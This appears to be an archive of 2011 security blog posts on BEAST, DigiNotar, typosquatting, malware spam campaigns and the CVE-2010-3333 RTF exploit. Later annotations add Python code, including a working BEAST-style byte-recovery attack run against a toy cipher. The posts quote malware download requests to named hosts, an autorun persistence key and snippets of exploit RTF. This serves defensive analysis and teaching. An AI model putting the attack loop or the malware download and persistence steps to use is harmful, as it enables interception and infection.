
The Beauty and the BEAST

By Avri Schneider  •  September 28th, 2011  •   General

Transport Layer Security (TLS) is the protocol used to secure HTTPS connections to web sites. For almost a decade it has been known that TLS 1.0 is open to a chosen-plaintext attack, primarily because of the way it uses the Cipher Block Chaining (CBC) mode of operation: the initialization vector for each record is the last ciphertext block of the previous record, which an attacker watching the wire can see before the next record is encrypted. TLS 1.1 and then TLS 1.2 were designed to cope with this (each record gets its own explicit, unpredictable IV) and with other weaknesses.

The attack, published as a theoretical result by Gregory V. Bard back in April 2006, has now been turned into a working exploit (though not seen in the wild). Just over a week ago, researchers Thai Duong and Juliano Rizzo demonstrated their proof of concept, called BEAST (Browser Exploit Against SSL/TLS), and a few days ago they published a blog post describing the attack in detail.

Even though Microsoft, Google, Mozilla and Opera have already released information or fixes for this issue, it is surprising that Internet Explorer, Chrome, Firefox and Opera, all current web browsers, left this vulnerability unpatched for so long, leaving many users exposed to exactly the kind of attack SSL was designed to protect against.

OpenSSL has shipped a workaround for this weakness since version 0.9.6d, released in May 2002: it sends an empty application-data record (which still carries a MAC and padding, so it occupies at least one cipher block) ahead of each real record, leaving the attacker unable to predict the IV the real data will be chained to. Some browsers, however, use the Network Security Services (NSS) library, which remained vulnerable to this attack.
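To make the chaining weakness described at the top of this post concrete, here is an added example, not code from this post or from Duong and Rizzo's tool, that simulates a TLS 1.0-style CBC sender and recovers a secret one byte at a time with the blockwise chosen-plaintext method, then shows the same attack failing against a TLS 1.1-style sender. Everything in it is an assumption made for illustration: the block cipher is a toy Feistel network built on SHA-256 standing in for AES, the `request` oracle stands in for a browser that sends attacker-chosen bytes followed by a secret cookie on one connection, the cookie value is constructed, and MACs and real TLS padding are left out.

```python
import hashlib
import os

BLOCK = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, block):
    """Toy 4-round Feistel cipher on 16-byte blocks: a keyed permutation standing in for AES."""
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _round_fn(key, rnd, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _round_fn(key, rnd, l)), l
    return l + r


def pad_to_block(data):
    return data + b"\x00" * (-len(data) % BLOCK)   # stand-in for TLS padding


class ChainedIvSender:
    """TLS 1.0 behaviour: record n is CBC-encrypted with the last ciphertext
    block of record n-1 as its IV, so the next IV is public before it is used."""

    def __init__(self, key):
        self.key, self.chain = key, os.urandom(BLOCK)

    def send(self, plaintext):
        out, prev = [], self.chain
        for i in range(0, len(plaintext), BLOCK):
            prev = block_encrypt(self.key, xor(plaintext[i:i + BLOCK], prev))
            out.append(prev)
        self.chain = prev
        return b"".join(out)


class ExplicitIvSender(ChainedIvSender):
    """TLS 1.1+ behaviour: a fresh random IV per record, transmitted in front of it."""

    def send(self, plaintext):
        iv = os.urandom(BLOCK)
        self.chain = iv
        return iv + super().send(plaintext)


def make_victim(sender, secret):
    """Browser-side oracle: attacker-chosen body, then the secret cookie, in one record."""
    def request(body):
        return sender.send(pad_to_block(body + secret))
    return request


def recover_secret(request, length):
    """Blockwise chosen-plaintext attack. Returns the recovered bytes, or None as
    soon as no guess for a byte verifies (what happens against an explicit-IV sender)."""
    last = request(b"")[-BLOCK:]              # attacker observes the current chain value
    recovered = b""
    for k in range(length):
        pad = (BLOCK - 1 - k) % BLOCK          # push secret byte k to the end of a block
        t = (pad + k) // BLOCK                 # index of the block holding byte k
        ct = request(b"A" * pad)
        blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
        c_prev = last if t == 0 else blocks[t - 1]
        c_target, last = blocks[t], blocks[-1]
        known = (b"A" * pad + recovered)[t * BLOCK:]   # the 15 known bytes of that block
        for g in range(256):
            guess = known + bytes([g])
            # The next record's first block is E(x XOR last). Choosing
            # x = c_prev XOR last XOR guess turns it into E(c_prev XOR guess),
            # which equals c_target exactly when guess is the real plaintext block.
            x = xor(xor(c_prev, last), guess)
            ct2 = request(x)
            last = ct2[-BLOCK:]
            if ct2[:BLOCK] == c_target:
                recovered += bytes([g])
                break
        else:
            return None
    return recovered


if __name__ == "__main__":
    cookie = b"session=7f3a9c21e4"            # constructed secret for the demo
    print(recover_secret(make_victim(ChainedIvSender(os.urandom(16)), cookie), len(cookie)))
    print(recover_secret(make_victim(ExplicitIvSender(os.urandom(16)), cookie), len(cookie)))
```

The byte-at-a-time alignment (the `pad` computation) is what turns Bard's block-level guess test into a practical 256-guess-per-byte attack; the same loop returns None against the explicit-IV sender because the attacker can no longer make the first block of a record encrypt a value of its choosing.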

The beauty is that the M86 Secure Web Gateway appliance in its default configuration provides zero-day protection against  this (and other) types of attack.

The complexity, time and cost of keeping all browsers in an organization patched against all the latest security threats highlights the importance of not relying solely on client-side security solutions.

Regardless of whether the browsers behind the gateway get patched, and how quickly that happens, they are protected by the M86 Security Secure Web Gateway.


DigiNotar Certificates Revoked Following Theft

By Anat Davidi  •  September 13th, 2011  •   General

Last year, as we considered possible future threats, one of our predictions for 2011 was that the use of stolen digital certificates would become increasingly common. We envisioned malicious websites and applications being signed with stolen certificates and accepted by products and applications that fail to keep up to date with such events. That prediction is becoming reality as we see more and more cases of stolen and misused certificates.

Recently, the Certification Authority DigiNotar was compromised, and its CA certificates were used to issue hundreds of rogue certificates. Among them was a certificate for *.google.com, which was used to mount Man-in-the-Middle attacks against users of Google's encrypted services.

Following this incident, companies such as Microsoft, Google and Mozilla have all taken action to protect their respective products.

M86 Security has issued a Security Update for our Secure Web Gateway product, moving the five DigiNotar root certificates to the untrusted list:

 

  • DigiNotar Root CA
  • DigiNotar Root CA G2
  • DigiNotar PKIoverheid CA Overheid
  • DigiNotar PKIoverheid CA Organisatie – G2
  • DigiNotar PKIoverheid CA Overheid en Bedrijven

 

 

Given that certificates issued under these roots have already been used in active attacks, customers are strongly advised to install this update (M86 Security Update 120).

 

With the update installed, Secure Web Gateway clients are protected against malicious files signed with certificates issued by this Certification Authority in an attempt to appear legitimate, as well as against Man-in-the-Middle attacks on users of encrypted services. Both will be blocked as a digital certificate violation.

 

To verify that the update has been installed and to observe the changes to Secure Web Gateway’s digital certificates, customers may inspect the product’s web administration interface under Administration > System Settings > Digital Certificates.  Here customers will see the certificates removed from the “M86 Security Trusted Root CA”, which can now be found under “M86 Security Untrusted Publishers”.

 

Secure Web Gateway Digital Certificates - "M86 Security Untrusted Publishers" list contains the five DigiNotar certificates

 

M86 Security will continue to keep track of the situation and take actions as necessary to keep our customers safe.


Typosquatters exploit misspelled variations of YouTube.com domain name

By Rodel Mendrez  •  September 8th, 2011  •   Cybercrime

Here is a scenario that may sound familiar. You are in front of your computer one night and decide to watch some YouTube clips. You open your favourite browser and, because you have clumsy fingers, instead of typing “YouTube.com” in the address bar you enter “YoutTube.com”. A second later a web page loads, but instead of YouTube's homepage you are redirected to an online survey. You are confused and did not expect this page, but since it looks like the real YouTube site and offers you a chance to win a MacBook Air, iPhone 4 or iPad 2, you decide to take the plunge anyway.

 

Welcome to typosquatting. Typosquatting is a form of cybersquatting in which someone registers an intentionally misspelled domain name, nearly identical to the target's brand, and profits from users who mistype the real one. Typosquatting is not new, but it is widespread. Only last week the folks at OpenDNS observed a typosquatting scam built on Twitter's domain.

In our YouTube example, entering YoutTube.com redirects the user to the “online survey” website videorewardsonline.com. According to Alexa.com, the domain videorewardsonline.com was only created on August 24 and has seen a rapid spike in traffic, a 29% increase in its share of global page views. We believe this spike is due to users being redirected from typosquatted domain names.

We have found the following misspelled variations of the “YouTube” domain redirecting either to a “survey” website or to an online dating website:

  • Yotube.com
  • Yutube.com
  • Yuube.com
  • Youtbe.com
  • Youtue.com
  • Youtub.com
  • Youube.com
  • Tubeyou.com
  • Yutbe.com
  • Outube.com
  • Yotub.com
  • Yutub.com
  • Youtbue.com
  • Youttube.com
  • Yyoutube.com
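Most of the names above are one keystroke away from the real domain, which is exactly how typosquat-hunting tools enumerate candidates. The following is an added example (not code from this post) that generates every single-keystroke misspelling of a domain, labels each with the edit that produces it, and then explains which of the observed domains fall into those classes; names that do not (the two-keystroke ones and the word swap "tubeyou") are reported as unexplained, which is itself useful when deciding what to register or monitor. The QWERTY neighbour map is an approximation for a US layout and is an assumption of this example.

```python
# Approximate QWERTY adjacency (assumption: US layout, letters only) for the "adjacent key" class.
_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm"]
ADJACENT = {}
for _r, _row in enumerate(_ROWS):
    for _c, _ch in enumerate(_row):
        _near = set()
        for _dr, _dc in ((0, -1), (0, 1), (-1, 0), (1, 0), (-1, 1), (1, -1)):
            _rr, _cc = _r + _dr, _c + _dc
            if 0 <= _rr < len(_ROWS) and 0 <= _cc < len(_ROWS[_rr]):
                _near.add(_ROWS[_rr][_cc])
        ADJACENT[_ch] = _near


def single_edit_variants(domain):
    """Map every one-keystroke misspelling of `domain` to the edit class that produces it.
    Precedence when a string is reachable several ways: omission, transposition,
    repetition, adjacent-key substitution."""
    name, tld = domain.lower().rsplit(".", 1)
    variants = {}

    def add(label, candidate):
        if candidate and candidate != name:
            variants.setdefault(candidate + "." + tld, label)

    for i in range(len(name)):                       # dropped character
        add("omission", name[:i] + name[i + 1:])
    for i in range(len(name) - 1):                   # two neighbouring characters swapped
        add("transposition", name[:i] + name[i + 1] + name[i] + name[i + 2:])
    for i in range(len(name)):                       # character typed twice
        add("repetition", name[:i] + name[i] + name[i:])
    for i in range(len(name)):                       # neighbouring key hit instead
        for ch in sorted(ADJACENT.get(name[i], ())):
            add("adjacent-key", name[:i] + ch + name[i + 1:])
    return variants


def classify_typo(target, candidate):
    """Edit class that turns `target` into `candidate`, or None if it is not a single-keystroke typo."""
    return single_edit_variants(target).get(candidate.lower())


def explain(target, candidates):
    """{candidate: class-or-None}; None marks names that need a different explanation."""
    table = single_edit_variants(target)
    return {c: table.get(c.lower()) for c in candidates}


# The domains listed in the post above.
OBSERVED = ["Yotube.com", "Yutube.com", "Yuube.com", "Youtbe.com", "Youtue.com",
            "Youtub.com", "Youube.com", "Tubeyou.com", "Yutbe.com", "Outube.com",
            "Yotub.com", "Yutub.com", "Youtbue.com", "Youttube.com", "Yyoutube.com"]

if __name__ == "__main__":
    for dom, cls in explain("youtube.com", OBSERVED).items():
        print(f"{dom:15} {cls or 'not a single-keystroke typo'}")
```

Running `explain` against the list shows ten of the fifteen names are single-keystroke typos (omission, transposition or repetition); the remaining five need two edits or are a word swap, so a defensive registration list built only from single-edit variants would miss a third of what the squatters actually registered.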

The survey website also serves localized versions of itself, using IP address geolocation to appear more convincing. In the screenshot below, a German page is shown to visitors located in Germany.

At first glance, the survey website looks rather harmless. However, in order to participate and “win” prizes it requires entering your email and mobile number. At this point you may feel that this is starting to look somewhat dodgy.

 

However, the worst part comes after you enter your mobile number. The screenshot below shows that the main purpose of the “survey” is to get people to subscribe to an auto-renewing SMS subscription service, which is charged to the user's phone bill.

 

You can clearly see how the people behind this typosquatting scam take advantage of an organization's strong visual brand to trick unsuspecting users into parting with their personal information. In this case, by imitating YouTube's look and feel, the scammers piggyback on the brand's trust to make the “rewards” seem genuine.

Be careful what you type in your browser’s address bar, and always read the fine print to avoid being scammed.

 


An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an electronic network for financial transactions in the United States, overseen by NACHA. Last week we came across a suspicious-looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. On closer investigation, we determined that it was indeed a fake ACH notification. The message carried a malicious attachment named “document.zip”. As suspected, the attachment was a downloader we have seen a lot of lately: Chepvil.

ACH spam campaign from the Donbot botnet

 

The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to reach its command and control server through a randomly generated domain name.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 of 45 antivirus engines, mostly under generic names, although some identified it as Trojan.Scar.eaml. On execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10 KB.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
KB117188.exe = "C:\Documents and Settings\{user}\Application Data\KB117188.exe"

After installation, the parent spambot process executes the svchost.exe it dropped in the Windows TEMP folder and then exits.
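Run-key entries like the one above are cheap to hunt for across a fleet, because the location and naming give the game away before any signature does. The following is an added example (not code from this post) that parses a `reg export` style dump of the Run key and flags entries that start from user-writable directories, use a hotfix-style KB{6 digits}.exe name, or reuse a system binary name such as svchost.exe outside System32. The registry dump below is constructed sample data modelled on the entry in the post; the directory lists are assumptions for a default Windows XP install.

```python
import re

# Assumptions: default install locations on Windows XP-era systems.
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\")
USER_WRITABLE = ("\\application data\\", "\\local settings\\temp\\", "\\temp\\", "\\appdata\\")
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}

RUN_KEY_RE = re.compile(
    r"^\[(HKEY_(?:CURRENT_USER|LOCAL_MACHINE)\\.*\\CurrentVersion\\Run(?:Once)?)\]$", re.I)
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg_export(text):
    """Yield (key, value_name, data) for string values in a `reg export` style dump."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            key = line
            continue
        m = VALUE_RE.match(line)
        if m and key:
            # reg export escapes backslashes and quotes inside string data
            data = m.group(2).replace('\\\\', '\\').replace('\\"', '"')
            yield key, m.group(1), data


def exe_path(data):
    """Executable path from a Run value: the quoted part, or the first token."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    return data.split(" ")[0]


def suspicious_run_entries(text):
    """Return (key, value_name, path, [reasons]) for autorun entries worth a second look."""
    findings = []
    for key, name, data in parse_reg_export(text):
        if not RUN_KEY_RE.match(key):
            continue
        path = exe_path(data)
        low = path.lower()
        reasons = []
        if any(d in low for d in USER_WRITABLE) and not low.startswith(SYSTEM_DIRS):
            reasons.append("autorun from user-writable directory")
        if re.search(r"\\kb\d{6}\.exe$", low):
            reasons.append("hotfix-style name KB{6 digits}.exe")
        base = low.rsplit("\\", 1)[-1]
        if base in SYSTEM_NAMES and "\\system32\\" not in low:
            reasons.append("system binary name outside System32")
        if reasons:
            findings.append((key, name, path, reasons))
    return findings


# Constructed sample: what `reg export HKCU\...\Run` would produce on the infected host.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"KB117188.exe"="\"C:\\Documents and Settings\\user\\Application Data\\KB117188.exe\""
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"Updater"="\"C:\\Documents and Settings\\user\\Local Settings\\Temp\\svchost.exe\" -k"
'''

if __name__ == "__main__":
    for key, name, path, reasons in suspicious_run_entries(SAMPLE_EXPORT):
        print(f"{name}: {path}\n    " + "; ".join(reasons))
```

On a live system, feed it the output of `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg` (and the HKLM equivalent); the legitimate ctfmon.exe entry in the sample passes, while both malware entries are reported with the reason that matched.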

Instead of listening on a port and waiting to be contacted, the proxy spambot connects out to its control server, first resolving the domain name luis-vuitton-elite[dot]com with a standard DNS A query. If that fails, the bot tries a randomly generated domain name instead.

 

The malware code that attempts to connect to the control server

 

Once connected, the proxy spambot uses port 1001 as its control channel, sending and receiving packets of data from the control server.

Exchange of data between the control server and the spambot

 

Meanwhile, on port 1002, the spambot receives the actual spam messages from the control server and relays them to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.

 

The command and control server’s IP address is based in Germany:

WHOIS information about the control server

 

This spambot's recent spamming activity includes both pharmaceutical spam and further ACH campaigns purporting to come from NACHA.org, very similar to the one that led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.


Want to be friends on Facebook? Don’t click the link!

By Phil Hay  •  August 29th, 2011  •   Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links.  However, there are clues it is fake.  The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom.

 

By contrast, here is a legitimate Facebook friend request.

 

Clicking the link fetches a web page that offers two ways to infect yourself. First, there is a link pretending to be an Adobe Flash update, through which you can download and install the malware manually. Second, there is a hidden iframe that loads content from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilities on your system, notably in Java.

 

 

The malware that is downloaded appears to be a data-stealing Zbot variant (see the VirusTotal report).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.

 


Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.

 

Last week malicious spam made up at least 13% of the total spam volume we received which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet, mostly use recycled spam themes: FedEx, credit card, changelogs and invoices. The malware is attached inside a compressed ZIP archive and is a Trojan that downloads additional malware, including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign

 

Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox

 

The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.


Malicious hotel transaction spam

By Gavin Neale  •  July 29th, 2011  •   Spam

Over the past couple of days we have been seeing numerous spam emails claiming that a hotel has made a wrong transaction on your credit card.
The subject lines look similar to the following two, with the hotel name varying:

Hotel Sutton Place made wrong transaction
Wrong transaction from your credit card in Four Seasons Resort Scottsdale

We have also seen several different message bodies that try to explain, in fairly bad English, that your credit card has been charged by a hotel and that in order to get your money back you will need to fill in an attached form and send it to your bank.

Dear Guest!
Transaction: Visa 86878_j
This letter notifies that on July 26th, 2011 Hotel made wrong writing-down from your credit account. Total sum of decommissioning is $1937
Due to the termination of service contract between Hotel Melia Deviana and Moverick Company this Hotel was divested accreditation in our company.
For the return of funds please contact your bank and fill information in the attached form.
The detailed copy of made writing-down you can find in the attachment.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Alexander Hargrave,
Manager of Reception Desk & Reservation Departament

Dear Client!
Transaction: Visa 4098_6e
On July 26th, 2011 Hotel made wrong transaction decommissioning from your credit card totaling $1037.
This partner hotel was divested accreditation in Moverick Company with reference of noncompliance of the service contract.
Please see the attached form. You need to fill it in and contact your bank for the return of funds.
In the attachment you will find expense sheet with the sum of wrong transaction writing-down.
Company just mediates and bears no responsibility for any money transactions made by Hotel.
Thank you for understanding. We trust you can solve this unpleasant problem.

Caleb Anketil,
Manager of Reception Desk & Reservation Departament

 

Attached is a Zip file named RefundFormXXX.zip, where XXX is a random three-digit number. Inside it is an executable, Refund-Form.exe, whose icon is clearly intended to make unsuspecting victims think it is some kind of form they can open and view.

The executable inside the 'RefundForm' Zip file

 

Once executed this malware downloads the file soft.exe from yomwarayom2001[dot]ru (84.247.61.25). This did not run straight away so we ran it on a separate test machine and verified that this is a fake AV product named ‘Security Protection’.

A further HTTP request is sent to 188.72.202.121, shown below, which requests a module called ‘grabbers’ from load.php.

The HTTP request and response for the encrypted password stealer

 

The file that is retrieved, called ‘update.dat’ is in fact an encrypted Windows dll file. Once decrypted we discovered that it was a password stealer which targets a huge number of applications including instant messaging programs, poker clients, FTP clients and web browsers looking for stored passwords.

Screenshot of the disassembled password stealer showing some of the targeted applications.

 

Almost a day later, with still no visible signs that our test machine was infected, the HTTP request below was sent which downloaded the file 1036.exe.

HTTP download of 1036.exe

 

Within minutes of this download finishing, a fake AV program called ‘Personal Shield pro’ was launched.

Both the attached executable files and those that were downloaded after the initial infection had very low detection rates among anti-virus engines, which highlights the need to be very cautious when opening email attachments and to keep anti-virus software up to date.

 

Thanks to Rodel Mendrez for his investigation into the password stealer component.


Resurrection of CVE-2010-3333 In-The-Wild

By Yaniv Miron  •  July 5th, 2011  •   Cybercrime

Over the last few weeks we have seen massive use of the CVE-2010-3333 vulnerability in Microsoft Office. This eight-month-old vulnerability is being used in lure documents such as one that pretends to be “President Obama's Speech”.

Microsoft Office vulnerabilities have become very popular over the last few years and here are several samples that can be found In-The-Wild that use MS10-087 / CVE-2010-3333.

A brief overview of the vulnerability can be found in the MITRE entry for CVE-2010-3333:

“Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka “RTF Stack Buffer Overflow Vulnerability.”

As we can see there is an exploit that is a part of the Metasploit exploit framework:


Figure 1 – Metasploit main page

The vulnerability is actually in the parsing of the .RTF file type, but it can be triggered from a file with a .DOC extension (not a genuine .DOC file, just RTF content with a .DOC name), since Word sniffs the content rather than trusting the extension.

Figure 2 – Part of the exploit from Metasploit

 

CVE-2010-3333 Sample Analysis

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

The following analysis was performed via Word 2003.

Here we can see the text view of the file and we can clearly see that they are using CVE-2010-3333:

Figure 3 – Text view of CVE-2010-3333 sample

Let's examine the hex view of the file:

Figure 4 – Hex view of CVE-2010-3333 sample

 

Now, let’s examine the beginning of the file:

{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1000000…[SNIP]…0;01234567ff000…[SNIP]…

From the Microsoft Office Word 2003 Rich Text Format (RTF) Specification:

“Drawing Object Properties

The bulk of a drawing object is defined as a series of properties. The {\shp control word is followed by {\*\shpinst. Following the {\*\shpinst is a list of all the properties of a shape. Each of the properties is in the following format:

{\sp {\sn PropertyName} {\sv PropertyValueInformation}}

The control word for the drawing object property is \sp. Each property has a pairing of the name (\sn) and value (\sv) control words placed in the shape property group.”

So the sample is an RTF file containing a shape property whose name (\sn) is pFragments. Fragments are optional, additional parts of a shape; they allow the shape to contain multiple paths and parts, and this property lists them. The value (\sv) that follows holds three semicolon-separated fields: a fragment count, a fragment size, and the hex-encoded fragment data. The third field, the fragment data, is what is copied into a fixed-size stack buffer and causes the buffer overflow.

Now that we’ve seen that hackers use the vulnerability In-The-Wild, let’s try and get a better understanding of the vulnerability by using the Metasploit sample:

{\rtf1{\shp{\sp{\sn pFragments}{\sv 5;6;11111111acc8111…[SNIP]…
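Both the in-the-wild sample and the Metasploit module put the payload in the same place, which makes a simple triage check possible. The following is an added example (not code from this post or from Metasploit) that extracts every pFragments property from an RTF file, parses its count;size;hexdata fields, and flags a property whose fragment size is far beyond what a drawing needs or whose hex payload is longer than count × size accounts for. The 64-byte size bound is an assumption, and the RTF snippets in the test are constructed in the shape of the two samples quoted above rather than copied from them.

```python
import re

# {\sn pFragments}{\sv count;size;hexdata} is the property the exploit abuses.
PFRAG_RE = re.compile(r"\{\\sn\s*pFragments\s*\}\s*\{\\sv\s*([^}]*)\}", re.I)

MAX_FRAGMENT_SIZE = 64   # assumption: a plausible upper bound for a real drawing fragment


def parse_pfragments(rtf):
    """One record per pFragments property: the fragment count and size the file claims,
    and how many bytes of hex data it actually supplies."""
    records = []
    for m in PFRAG_RE.finditer(rtf):
        fields = [f.strip() for f in m.group(1).split(";", 2)]
        if len(fields) < 3:
            continue
        try:
            count, size = int(fields[0]), int(fields[1])
        except ValueError:
            continue
        hexdata = re.sub(r"\s+", "", fields[2])
        records.append({"count": count, "size": size, "payload_bytes": len(hexdata) // 2})
    return records


def is_suspicious(rec):
    """Flag an element size no drawing needs, or more payload than count*size accounts for.
    Both are values the Office parser takes from the file before copying the data."""
    return rec["size"] > MAX_FRAGMENT_SIZE or rec["payload_bytes"] > rec["count"] * rec["size"]


def scan_rtf(rtf):
    """Suspicious pFragments records found in an RTF document (text already read into memory)."""
    return [r for r in parse_pfragments(rtf) if is_suspicious(r)]


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "r", errors="replace") as fh:
        for rec in scan_rtf(fh.read()):
            print("suspicious pFragments:", rec)
```

Two caveats for production use: the check applies equally to .DOC-named files, since the content is still RTF, and real samples frequently obfuscate control words (hex escapes, nested groups, whitespace) so the text should be normalised before the regular expression sees it.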

 

ASM Info:

30e9eb72 81e1ffff0000    and     ecx,0FFFFh
30e9eb78 56              push    esi
30e9eb79 8bf1            mov     esi,ecx
30e9eb7b 0faf742414      imul    esi,dword ptr [esp+14h]
30e9eb80 037010          add     esi,dword ptr [eax+10h]
30e9eb83 8bc1            mov     eax,ecx
30e9eb85 c1e902          shr     ecx,2
30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]   ; Overflow!
30e9eb8a 8bc8            mov     ecx,eax
30e9eb8c 83e103          and     ecx,3
30e9eb8f f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
30e9eb91 5e              pop     esi
30e9eb92 5f              pop     edi
30e9eb93 c20c00          ret     0Ch

 

Debugger info:

(100.3f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c8ac ebx=05000000 ecx=00000023 edx=00000000 esi=025dc82c edi=00130000
eip=30e9eb88 esp=001237b8 ebp=001237f0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
…[SNIP]…
mso!Ordinal6426+0x64d:
30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

 

In-The-Wild Samples

Here are few of the samples that we’ve found:

File Name: 2011 Insider’s Guide to Military Benefits .doc

MD5: f520c8671ddb9965bbf541f20635ef30

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

File Name: Q and A.doc

MD5: 46863c6078905dab6fd9c2a480e30ad0

The samples use different shellcodes, but as we can see, the exploit is In-The-Wild and is being used by malicious hackers.

These types of attacks are blocked by M86 Security’s Secure Web Gateway solution.


Malicious spam campaign: Credit Card Overdue

By Rodel Mendrez  •  June 30th, 2011  •   Spam

We are currently seeing a large scale malicious spam campaign that claims to be a “Credit Card Overdue” notice. The campaign is originating from one of the Cutwail spambot variants. The theme has no specific credit card brand, possibly because the spammer thought a generic template may entice more victims. The spam message claims the credit card holder has an overdue credit card that needs to be settled in 2 days or else a $25 late fee and finance charge will be imposed.

The malicious application is attached in a Zip file disguised as a credit card statement. Extracting the Zip file reveals a Trojan downloader executable that uses an Adobe PDF icon. When the executable is run it downloads a fake anti-virus executable from the following URL:

http://mysteryforyou1[dot]ru/pusk.exe
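Both this campaign and the hotel transaction spam above rely on the same trick: an executable inside a Zip attachment, dressed up with a document icon so the victim opens it. The following is an added example (not code from either post) of the triage a mail gateway or analyst script can do on such an attachment without extracting anything to disk: list the archive members and flag any that have an executable extension, carry a double extension, or start with a PE header regardless of what the name says. The Zip built by `build_sample_zip` is constructed test data with member names modelled on the posts; the size guard is an assumption.

```python
import io
import zipfile

PE_MAGIC = b"MZ"
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs")
MAX_ENTRY = 50 * 1024 * 1024   # assumption: don't inflate members larger than this (zip-bomb guard)


def build_sample_zip():
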